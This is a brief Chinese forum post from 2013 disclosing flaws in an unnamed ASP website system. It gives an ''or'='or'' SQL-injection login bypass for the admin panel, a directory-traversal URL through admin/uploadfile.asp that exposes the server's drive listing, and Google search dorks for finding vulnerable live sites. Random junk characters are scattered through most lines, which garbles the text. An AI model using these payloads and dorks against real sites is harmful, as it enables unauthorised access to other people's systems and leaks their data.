后台万能密码 'or'='or'
0 Y$ F9 Z0 i6 c# c) _# H. m( _) w! h5 F1 ?2 G2 _9 R3 Y/ M
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ N5 s; H3 z0 f1 x: R& \ t
admin/uploadfile.asp?currentFolder=/upfiles/../; |4 K) s6 }. ?2 ~4 [
& K2 l# n5 U9 U' c8 b- e
漏洞证明:, y& ~ _+ M7 B+ ~$ l: X" [
1 T5 L& |& x& }7 n) E
谷歌:inurl:type.asp?id=1 新闻中心! i4 ~" A( b( ^5 `3 U" m4 P
或者 :inurl:download_ok.asp?5 Q; V# f4 m E- ~7 h
+ s8 f2 H$ U$ I4 c' l( C
|
发表于 2013-3-14 20:17:32
收藏
支持
反对